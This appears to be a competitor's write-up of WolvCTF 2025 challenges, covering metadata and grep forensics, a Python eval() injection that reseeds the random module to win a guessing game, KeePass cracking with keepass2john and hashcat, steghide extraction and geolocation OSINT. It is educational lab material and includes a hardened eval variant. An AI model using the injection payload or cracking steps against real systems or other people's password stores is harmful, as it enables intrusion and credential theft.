Competition: WolvCTF 2025
Competition time: 22 Mar 2025 07:00 CST - 24 Mar 2025 07:00 CST
Challenges reproduced after the event are marked with 🔁
Beginner
PicturePerfect - Forensics
Challenge
PicturePerfect - Forensics
Author: carmengh
Wow what a respectful, happy looking lad! Hmmmmmmm, all I see is a snowman… maybe some details from the image file itself will lead us to the flag.
Hint (0 points): Images have interesting information in their metadata!
Solution
Just look at the metadata.
```
exiftool-13.25_64>exiftool hi_snowman.jpg
ExifTool Version Number : 13.25
File Name : hi_snowman.jpg
Directory : .
File Size : 4.1 MB
Zone Identifier : Exists
File Modification Date/Time : 2025:03:23 22:34:32+08:00
File Access Date/Time : 2025:03:23 22:57:47+08:00
File Creation Date/Time : 2025:03:23 22:57:36+08:00
File Permissions : -rw-rw-rw-
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Exif Byte Order : Big-endian (Motorola, MM)
Padding : (Binary data 268 bytes, use -b option to extract)
XMP Toolkit : Image::ExifTool 11.88
About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Title : wctf{d0_yOU_w@nt_t0_BUiLd_a_Sn0Wm@n}
Image Width : 3024
Image Height : 4032
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 3024x4032
Megapixels : 12.2
```
```
wctf{d0_yOU_w@nt_t0_BUiLd_a_Sn0Wm@n}
```
DigginDir - Forensics
Challenge
DigginDir - Forensics
Author: carmengh
So I tripped on an uneven sidewalk today… and I dropped the flag somewhere (oops). It’s gotta be here somewhere… right?
Hint (0 points): I wish there was a linux utility that let me search for stuff...
Solution
Search on Linux:
```
┌──(kali㉿kali)-[~/桌面/challenge]
└─$ grep -r "wctf{" .
./pics/WolvCTF2025/EUOlptwlpqPt5qrGlMnFpbat6/.secret:wctf{0h_WOW_tH@Nk5_yOu_f0U^d_1t_xD}
```
Or search in VSCode.
```
wctf{0h_WOW_tH@Nk5_yOu_f0U^d_1t_xD}
```
Misc
Eval is Evil
Challenge
Eval is Evil
Author: EmptyBytes
If eval is so bad, then why is it so easy to use?
```python
import random

def main():
    print("Let's play a game, I am thinking of a number between 0 and", 2 ** 64, "\n")
    try:
        guess = eval(input("What is the number?: "))
    except:
        guess = 0
    correct = random.randint(0, 2**64)
    if (guess == correct):
        print("\nCorrect! You won the flag!")
        flag = open("flag.txt", "r").readline()
        print(flag)
    else:
        print(guess)
        print(correct)
        print("\nYou lost lol")

main()
```
Solution
The program uses the random library to generate a random number, correct, and compares it with the input, guess. If we can make the two equal, the flag is returned (obviously).
The eval() here leaves room to work with.
I looked up how the random library works and learned that once random.seed() has been set to a value, the pseudo-random numbers that random generates afterwards are fixed.
So I constructed the payload below: first set random.seed(0), then call random.randint(0, 2**64) just as the source does, and finally set random.seed(0) again. The next "random number" generated will then be the same as this one.
```python
(random.seed(0), random.randint(0, 2**64), random.seed(0))[1]
```
```
E:\Desktop>ncat evalisevil.kctf-453514-codelab.kctf.cloud 1337
== proof-of-work: disabled ==
Let's play a game, I am thinking of a number between 0 and 18446744073709551616

What is the number?: (random.seed(0), random.randint(0, 2**64), random.seed(0))[1]

Correct! You won the flag!
wctf{Why_Gu3ss_Wh3n_Y0u_C4n_CH34T}
```
```
wctf{Why_Gu3ss_Wh3n_Y0u_C4n_CH34T}
```
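As an added example (not part of the original write-up or the challenge source), the code below places the challenge's eval() logic next to a hardened variant that parses the guess as data and draws the secret from the OS CSPRNG. The names vulnerable_round, hardened_round and PAYLOAD are assumptions made for this illustration.

```python
import random
import secrets

# Payload from the write-up: it reseeds the shared PRNG, so the next
# randint() call returns the same value the payload itself evaluates to.
PAYLOAD = "(random.seed(0), random.randint(0, 2**64), random.seed(0))[1]"


def vulnerable_round(user_input: str) -> bool:
    """Same logic as the challenge: eval() executes the input in-process."""
    try:
        # The expression runs with this module's globals, including `random`.
        guess = eval(user_input)
    except Exception:
        guess = 0
    correct = random.randint(0, 2**64)
    return guess == correct


def hardened_round(user_input: str) -> bool:
    """Treat the input as data only and keep the secret out of reach."""
    try:
        # int() accepts an integer literal and nothing else; no code runs.
        guess = int(user_input.strip(), 10)
    except ValueError:
        return False
    # secrets uses the OS CSPRNG: it cannot be seeded and does not share
    # state with the module-level `random` generator.
    correct = secrets.randbelow(2**64 + 1)
    return guess == correct


if __name__ == "__main__":
    print("vulnerable, payload wins:", vulnerable_round(PAYLOAD))
    print("hardened, payload wins:  ", hardened_round(PAYLOAD))
```

Either change alone defeats this payload, but only removing eval() closes the underlying code-execution path.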
Forensics
🔁Passwords
Challenge
Passwords
Author: dree
I heard you’re a hacker. Can you help me get my passwords back?
Database.kdbx
Solution
The attachment is a KeePass database, so try to brute-force it.
Here I used the tool ivanmrsulja/keepass2john, which converts a KeePass database (kdbx) into John the Ripper format.
```
python keepass2john.py Database.kdbx > hash.txt
```
Delete the leading Database<SHOULD_BE_REMOVED_INCLUDING_COLON>: from the resulting hash.txt, keeping the part below.
```
$keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea179b66978615917c39faf6edd98444928b*dec1f1a8a46d2257b1c536800ccea618d15523c983162f1a760d0f0e3f32bed6*02dc62f9e295c9a256e4e231b3102c1a*8ed6478291ac58151a98e7465f10a11e8cafc1706d048ef4f94fe51453f091bc*193dd9a5673c4a3f5b33dd59639f27760f03285044f14eacc652f4a441b45413
```
Then crack it with hashcat.
```
hashcat -a 0 -m 13400 hash.txt ./pics/WolvCTF2025/wordlists/rockyou.txt
```
The rockyou.txt here is the wordlist that ships with Kali, /usr/share/wordlists/rockyou.txt.gz; I copied it from the virtual machine to my physical machine.
Below is the output after running the command.
```
hashcat (v6.2.6) starting

* Device
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 12.7)
====================
* Device

OpenCL API (OpenCL 3.0 CUDA 12.7.33) - Platform
=======================================================================
* Device

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1475 MB

Dictionary cache built:
* Filename..: ./pics/WolvCTF2025/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea179b66978615917c39faf6edd98444928b*dec1f1a8a46d2257b1c536800ccea618d15523c983162f
f1a760d0f0e3f32bed6*02dc62f9e295c9a256e4e231b3102c1a*8ed6478291ac58151a98e7465f10a11e8cafc1706d048ef4f94fe51453f091bc*193dd9a5673c4a3
3f5b33dd59639f27760f03285044f14eacc652f4a441b45413:goblue1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*6000*222*5bd85bff1c654df5d8cb8f64b877ea...b45413
Time.Started.....: Thu Mar 27 20:32:01 2025 (1 sec)
Time.Estimated...: Thu Mar 27 20:32:02 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./pics/WolvCTF2025/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 181.7 kH/s (9.00ms) @ Accel:8 Loops:256 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 98304/14344385 (0.69%)
Rejected.........: 0/98304 (0.00%)
Restore.Point....: 49152/14344385 (0.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5888-6000
Candidate.Engine.: Device Generator
Candidates.#1....: truckin -> Donovan
Hardware.Mon.#1..: Temp: 49c Util: 28% Core:2535MHz Mem:8000MHz Bus:8

Started: Thu Mar 27 20:31:59 2025
Stopped: Thu Mar 27 20:32:03 2025
```
So the password is goblue1.
Open the database online with KeeWeb.
```
wctf{1_th0ught_1t_w4s_s3cur3?}
```
🔁Breakout
Challenge
Breakout
Author: Sudojacob
Something fishy about that photo… What could be hidden in this game?
Solution
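```
steghide extract -sf breakout.jpg
```
Extract with steghide; the passphrase is empty.
```
steghide extract -sf breakout.jpg
Enter passphrase:
wrote extracted data to "breakout.ch8".
```
This extracts a file, breakout.ch8.
Searching online, I found that .ch8 files are program files designed for the CHIP-8 virtual machine.
I then found this online emulator, CHIP-8 Emulator, which is open source on GitHub at eth-p/uni-chip8.
Playing this simple little game reveals the flag.
```
WCTF{GAME_OVER_VMASBKLTNUFMGS}
```
OSINT
Wintery
Challenge
Wintery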
Author: pradhamk
As the snow has once again started to fall, I spotted a flag afar. Can you find where this picture was taken? Truncate your coordinates to 3 decimal places.
Flag format: wctf
Hint: flag is in format wctf{##.##a,##.##b} where a+b == 4
no leading zero, no space
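Solution
The flag visible in the picture lets us narrow the location down to the University of Michigan.
The spot can then be found in Google Street View: 530 S State St - Google Maps
From the details in the photo, I inferred that the picture was taken from this building.
I picked a nearby point.
It satisfies the challenge's conditions.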